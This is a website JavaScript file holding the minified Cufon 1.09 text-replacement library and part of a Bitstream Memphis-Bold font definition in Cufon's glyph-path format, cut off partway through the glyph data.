// JavaScript Document

//CUFON

/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										//FONT Memphis-Bold_500
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1990-1999 Bitstream Inc.  All rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"147,-111v-4,-38,-58,-22,-70,-1r0,78r26,0r0,34r-91,0r0,-34r24,0r0,-192r-24,0r0,-34r65,0r0,115v27,-33,112,-36,111,24r0,87r24,0r0,34r-89,0r0,-34r24,0r0,-77","w":219},{"d":"7,31r0,-31r42,0r0,-229r-42,0r0,-31r80,0r0,291r-80,0","w":100},{"d":"11,-132r0,-34r76,0r0,34r-18,0r29,81r34,-81r-20,0r0,-34r79,0r0,34r-21,0r32,83r33,-83r-21,0r0,-34r75,0r0,34r-16,0r-56,134r-28,0r-40,-91r-37,91r-28,0r-55,-134r-18,0","w":299,"k":{".":27,",":27}},{"d":"10,0r0,-35r27,0r0,-190r-27,0r0,-35r203,0r0,69r-42,0r0,-34r-87,0r0,66r78,0r0,41r-78,0r0,83r31,0r0,35r-105,0","w":219,"k":{"A":20,".":46,",":46}},{"d":"191,-29r-166,0r0,-38r166,0r0,38xm191,-99r-166,0r0,-38r166,0r0,38","w":216},{"d":"60,-60v18,0,32,15,32,32v0,17,-15,31,-32,32v-17,0,-32,-14,-32,-32v-1,-18,14,-33,32,-32xm88,-260r-8,182r-39,0r-9,-182r56,0","w":119},{"d":"60,-131v0,93,132,131,166,46r-61,0r0,-38r126,0r0,38r-27,0r0,85r-38,0r0,-27v-19,18,-45,33,-79,33v-79,0,-134,-59,-134,-137v0,-97,125,-175,207,-111r0,-18r38,0r0,90r-37,0v-6,-34,-34,-50,-72,-52v-50,-2,-89,42,-89,91","w":299},{"d":"68,-220r-2,-40r32,0r-5,42r39,-14r8,34r-42,5r25,36r-30,15r-16,-39r-27,32r-24,-23r34,-26r-40,-8r11,-33","w":159},{"d":"210,-83v0,75,-96,116,-138,60r0,23r-61,0r0,-34r25,0r0,-192r-25,0r0,-34r66,0r0,113v45,-50,133,-8,133,64xm120,-31v31,0,48,-25,48,-53v0,-28,-17,-51,-48,-51v-30,0,-47,24,-47,51v0,28,17,53,47,53","w":219},{"d":"287,-131v0,57,-34,101,-73,121r7,14r36,0r0,41r-61,0r-21,-42v-94,14,-158,-45,-162,-134v-3,-74,62,-134,137,-134v75,0,137,60,137,134xm60,-131v-1,55,40,100,94,93r-13,-26r35,-21r17,35v28,-14,47,-40,47,-81v1,-48,-40,-91,-89,-91v-55,0,-90,40,-91,91","w":299},{"w":90},{"d":"9,-175v0,-39,28,-72,67,-71r0,-27r20,0r0,29v12,4,24,7,33,15r0,-15r29,0r0,71r-26,0v-4,-19,-17,-35,-36,-39r0,64v39,15,76,25,75,77v0,39,-31,75,-75,73r0,29r-20,0r0,-31v-17,0,-31,-11,-40,-19r0,19r-28,0r0,-81r27,0v2,22,20,42,41,45r0,-75v-30,-9,-67,-25,-67,-64xm131,-69v-1,-23,-20,-28,-35,-36v2,22,-4,53,2,71v18,1,34,-16,33,-35xm76,-214v-24,0,-36,31,-20,49v5,5,12,9,20,11r0,-60"},{"d":"18,-115v0,-52,66,-68,102,-42r0,-9r33,0r0,53r-35,0v1,-29,-57,-38,-63,-8v2,17,27,15,45,18v32,5,65,15,65,54v0,56,-73,65,-110,39r0,10r-36,0r0,-57r36,0v7,21,24,35,53,30v10,-1,19,-4,19,-16v-2,-18,-27,-18,-46,-22v-30,-5,-63,-11,-63,-50"},{"d":"53,-71v-2,44,72,52,89,22r41,0v-8,34,-40,52,-83,53v-50,2,-90,-36,-90,-87v0,-80,110,-117,155,-59v15,19,23,42,23,71r-135,0xm147,-99v-4,-45,-89,-47,-94,0r94,0","w":200},{"d":"102,-61r-91,0r0,-39r92,-154r39,0r0,157r25,0r0,36r-25,0r0,27r25,0r0,34r-96,0r0,-34r31,0r0,-27xm102,-97v-2,-29,4,-67,-2,-92r-54,92r56,0"},{"d":"42,-260r46,0r-30,77r-46,0","w":100,"k":{"\u2019":13,"t":6,"s":27}},{"d":"66,-35r84,0r0,-45r41,0r0,80r-182,0r0,-34r126,-191r-81,0r0,35r-41,0r0,-70r178,0r0,35","w":200},{"d":"124,41r0,34r-98,0r0,-34r29,0r21,-44r-57,-129r-14,0r0,-34r79,0r0,34r-22,0r36,82r39,-82r-23,0r0,-34r81,0r0,34r-18,0r-81,173r28,0","w":200,"k":{".":27,",":27}},{"d":"103,0v-35,7,-68,6,-68,-36r0,-96r-25,0r0,-34r25,0r0,-58r41,0r0,58r29,0r0,34r-29,0r0,87v-1,16,14,15,27,13r0,32","w":119},{"d":"49,-260r45,0r-30,77r-45,0xm135,-260r46,0r-30,77r-46,0","w":200},{"d":"93,-260v40,1,75,34,74,78r0,103v9,77,-84,110,-129,63v-14,-14,-20,-33,-20,-55r41,-1v1,22,9,39,32,39v33,0,35,-41,33,-80v-42,39,-115,4,-111,-62v3,-49,30,-87,80,-85xm90,-220v-20,0,-33,19,-33,42v0,23,13,42,33,42v20,0,34,-18,34,-42v0,-24,-14,-42,-34,-42"},{"d":"58,-183r-46,0r30,-77r46,0","w":100,"k":{"\u2018":13}},{"d":"131,-229v-2,-17,-16,-23,-38,-21r0,111v0,15,2,14,18,15r0,10r-78,0r0,-10v16,-1,18,0,18,-15r0,-111v-22,-2,-37,4,-38,22r-9,-1r0,-31r136,0r0,31r-9,0xm179,-150v0,-38,14,-100,-25,-101r0,-9r56,0r48,97r50,-97r48,0r0,9v-15,1,-18,1,-18,16r0,96v0,15,2,14,18,15r0,10r-78,0r0,-10v17,-1,18,0,18,-15r0,-76r-51,100r-6,0r-48,-100r0,65v1,19,0,25,19,26r0,10r-49,0r0,-10v19,0,18,-7,18,-26","w":360},{"d":"70,-114v39,3,87,48,108,-1v3,11,12,23,12,34v-11,27,-54,37,-81,17v-21,-16,-64,-17,-71,13r-13,-33v9,-14,20,-32,45,-30","w":216},{"d":"165,-201v17,-1,20,8,25,18r4,-12r28,0r-22,104v0,8,5,20,14,16v21,-11,35,-45,33,-80v-3,-47,-49,-92,-108,-82v-51,9,-82,49,-82,117v0,52,47,99,97,98v33,0,54,-6,75,-18r4,21v-22,12,-45,25,-78,25v-86,-2,-137,-51,-142,-129v-5,-80,62,-142,138,-142v70,0,132,54,123,128v-5,39,-27,80,-69,81v-21,1,-31,-13,-35,-29v-8,16,-27,33,-50,28v-19,-4,-30,-21,-30,-47v0,-48,25,-94,75,-97xm141,-79v30,-6,46,-53,38,-93v-2,-4,-6,-6,-12,-6v-26,6,-41,34,-42,66v0,15,4,31,16,33","w":288},{"d":"146,-32r-66,-175r0,172r29,0r0,35r-98,0r0,-35r26,0r0,-190r-26,0r0,-35r99,0r51,149r54,-149r94,0r0,35r-26,0r0,190r26,0r0,35r-98,0r0,-35r29,0r-1,-172r-64,175r-29,0","w":320},{"d":"60,-60v18,0,33,14,32,32v0,18,-15,32,-32,32v-17,0,-32,-14,-32,-32v-1,-18,14,-32,32,-32xm180,-60v18,0,33,14,32,32v0,18,-15,32,-32,32v-17,0,-32,-14,-32,-32v-1,-18,14,-32,32,-32xm300,-60v18,0,33,14,32,32v0,18,-15,32,-32,32v-17,0,-32,-14,-32,-32v-1,-18,14,-32,32,-32","w":360},{"d":"10,-83v-7,-75,97,-117,138,-58r0,-25r60,0r0,34r-26,0r0,98r26,0r0,34r-60,0r0,-24v-40,57,-146,16,-138,-59xm99,-31v31,0,46,-25,46,-53v0,-28,-15,-51,-46,-51v-30,0,-47,24,-47,51v0,28,17,53,47,53","w":219},{"d":"14,0r0,-34r25,0r0,-192r-25,0r0,-34r67,0r0,226r25,0r0,34r-92,0","w":119},{"d":"49,-260r46,0r-30,77r-46,0xm136,-260r45,0r-29,77r-46,0","w":200},{"d":"50,-132r0,21r-37,0r0,-55r135,0r0,34r-86,98r52,0r0,-22r37,0r0,56r-142,0r0,-34r87,-98r-46,0","w":159},{"d":"0,-76r0,-33r360,0r0,33r-360,0","w":360},{"d":"21,-260r38,0r0,260r-38,0r0,-260","w":79},{"d":"7,-266r116,272r-30,0r-116,-272r30,0","w":100},{"d":"190,-83v0,51,-39,87,-90,87v-50,0,-90,-36,-90,-87v0,-51,40,-87,90,-87v51,0,90,36,90,87xm100,-31v32,0,49,-24,48,-53v0,-28,-17,-51,-48,-51v-32,0,-48,25,-48,53v1,27,17,51,48,51","w":200},{"d":"0,-109r180,0r0,33r-180,0r0,-33"},{"d":"188,-34r0,34r-81,0r0,-34r14,0r-46,-48r0,48r18,0r0,34r-80,0r0,-34r21,0r0,-192r-20,0r0,-34r61,0r0,170r47,-42r-16,0r0,-34r82,0r0,34r-15,0r-51,45r50,53r16,0","w":200},{"d":"90,6v-46,0,-77,-35,-77,-84r0,-98v-2,-49,32,-84,77,-84v45,0,77,35,77,84r0,98v2,49,-31,84,-77,84xm90,-220v-56,3,-34,92,-34,145v0,23,9,43,34,42v56,-3,34,-93,34,-147v0,-22,-10,-41,-34,-40"},{"d":"26,6r-30,0r78,-272r30,0","w":100},{"d":"135,-35r22,0r-39,-58r-39,58r23,0r0,35r-94,0r0,-35r22,0r64,-95r-62,-95r-24,0r0,-35r97,0r0,35r-22,0v13,18,24,39,38,56r38,-56r-23,0r0,-35r95,0r0,35r-24,0r-62,93r65,97r